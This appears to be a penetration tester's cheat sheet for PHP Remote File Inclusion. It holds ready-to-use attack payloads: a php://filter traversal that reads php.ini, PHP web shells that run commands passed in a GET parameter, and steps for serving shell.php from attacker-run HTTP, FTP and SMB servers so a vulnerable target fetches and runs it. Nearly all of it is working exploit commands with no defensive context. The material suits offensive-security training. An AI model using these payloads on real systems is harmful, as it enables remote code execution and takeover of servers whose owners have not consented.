# Verify RFI ```bash http://$IP:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini echo '<base64>' | base64 -d | grep allow_url_include ``` ```bash /index.php?language=http://127.0.0.1:80/index.php ``` # HTTP + PHP ```bash <?php phpinfo(); ?> <?php system('whoami'); ?> <?php system($_GET['cmd']); ?> cat << EOF > shell.php <?php system($_GET['cmd']); ?> EOF ``` # FTP ```bash sudo python -m pyftpdlib -p 21 ftp://<IP>/shell.php&cmd=id # if the server requires valid authentication curl '.../index.php?language=ftp://user:pass@localhost/shell.php?cmd=id' ``` # Samba SMB server > RFI if the vulnerable web application is hosted on a Windows server, we don't need the `allow_url_include` setting to be enabled for RFI exploit because we can utilize SMB for the RFI. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path. ##### 1 ```bash impacket-smbserver -smb2support share $(pwd) /index.php?language=\\<IP>\share\shell.php&cmd=whoami ``` ##### 2 ```bash [wook] path = /home/kali/wook writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody ``` ```bash # change the directory and run the commands cd /home/kali/wook chmod 0555 /home/kali/wook sudo chown -R nobody:nogroup /home/kali/wook ``` ```bash sudo service smbd restart ``` ```bash # check if our server is running smbmap -H <my_IP> ```